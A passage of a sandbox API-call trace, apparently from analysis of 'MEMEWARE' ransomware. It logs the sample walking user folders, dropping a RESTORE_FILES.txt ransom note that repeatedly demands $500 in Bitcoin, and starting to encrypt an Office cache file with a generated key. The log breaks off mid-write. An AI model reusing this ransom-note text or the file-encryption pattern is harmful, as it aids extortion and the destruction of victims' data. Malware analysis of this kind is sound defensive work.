\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.074] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.074] lstrlenA (lpString="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") returned 684 [0085.074] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.075] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.075] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.075] CloseHandle (hObject=0x150) returned 1 [0085.075] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.075] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.075] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt") returned 103 [0085.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.075] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.075] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.076] lstrlenA (lpString="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") returned 684 [0085.076] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.076] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.076] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.076] CloseHandle (hObject=0x14c) returned 1 [0085.078] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="Windows") returned -1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="Program Files") returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="Program Files (x86)") returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="$Recycle.bin") returned 1 [0085.078] lstrcmpiW (lpString1="Transcoded Files Cache", lpString2="System Volume Information") returned 1 [0085.078] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned 93 [0085.078] lstrcmpW (lpString1="Transcoded Files Cache", lpString2=".") returned 1 [0085.078] lstrcmpW (lpString1="Transcoded Files Cache", lpString2="..") returned 1 [0085.078] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*") returned 95 [0085.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.079] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.079] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.079] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.079] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.079] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.079] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\.") returned 95 [0085.079] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.079] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.079] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.079] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.079] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.079] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.079] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.079] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\..") returned 96 [0085.079] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.079] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.080] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.080] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.080] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\RESTORE_FILES.txt") returned 111 [0085.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\transcoded files cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.080] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.080] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.081] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.081] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.081] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.081] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.081] CloseHandle (hObject=0x14c) returned 1 [0085.081] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.081] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.081] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\RESTORE_FILES.txt") returned 88 [0085.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media 
Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.082] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.082] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.083] lstrlenA 
(lpString="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") returned 684 [0085.083] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.083] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.083] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.083] CloseHandle (hObject=0xd8) returned 1 [0085.083] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="Windows") returned -1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="Program Files") returned -1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="Program Files (x86)") returned -1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="$Recycle.bin") returned 1 [0085.083] lstrcmpiW (lpString1="Office", lpString2="System Volume Information") returned -1 [0085.083] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office") returned 64 [0085.083] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0085.083] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0085.083] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*") returned 66 [0085.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*", 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.084] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.084] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.084] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.084] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.084] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\.") returned 66 [0085.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.084] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.084] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.084] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.084] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.084] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\..") returned 67 [0085.084] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.084] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.084] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="Windows") returned -1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="Program Files") returned -1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="Program Files (x86)") returned -1 [0085.084] lstrcmpiW (lpString1="14.0", lpString2="$Recycle.bin") returned 1 [0085.084] lstrcmpiW 
(lpString1="14.0", lpString2="System Volume Information") returned -1 [0085.084] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0") returned 69 [0085.084] lstrcmpW (lpString1="14.0", lpString2=".") returned 1 [0085.084] lstrcmpW (lpString1="14.0", lpString2="..") returned 1 [0085.084] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*") returned 71 [0085.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.085] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.085] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.085] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.085] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.085] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.085] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\.") returned 71 [0085.085] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.085] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.086] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.086] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.086] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.086] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.086] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.086] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\..") returned 72 [0085.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.086] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="Windows") returned -1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="Program Files") returned -1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="Program Files (x86)") returned -1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="$Recycle.bin") returned 1 [0085.086] lstrcmpiW (lpString1="OfficeFileCache", lpString2="System Volume Information") returned -1 [0085.086] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache") returned 85 [0085.086] lstrcmpW (lpString1="OfficeFileCache", lpString2=".") returned 1 [0085.086] lstrcmpW (lpString1="OfficeFileCache", lpString2="..") returned 1 [0085.087] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*") returned 87 [0085.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.088] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.088] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.088] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.088] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.088] lstrcmpiW (lpString1=".", lpString2="System Volume Information") 
returned -1 [0085.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\.") returned 87 [0085.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.088] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.088] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.088] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.088] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.088] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.088] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\..") returned 88 [0085.088] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.088] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="Windows") returned -1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="Program Files") returned -1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="Program Files (x86)") returned -1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="$Recycle.bin") returned 1 [0085.088] lstrcmpiW (lpString1="FSD-CNRY.FSD", lpString2="System Volume Information") returned -1 [0085.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.088] StrStrIW (lpFirst="FSD-CNRY.FSD", lpSrch=".protected") returned 0x0 [0085.088] 
lstrcmpW (lpString1="FSD-CNRY.FSD", lpString2="RESTORE_FILES.txt") returned -1 [0085.088] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.088] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.089] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".txt") returned 0x0 [0085.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.090] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".rar") returned 0x0 [0085.090] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD") returned 98 [0085.090] StrStrW (lpFirst="FSD-CNRY.FSD", lpSrch=".zip") returned 0x0 [0085.090] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.102] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.102] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, 
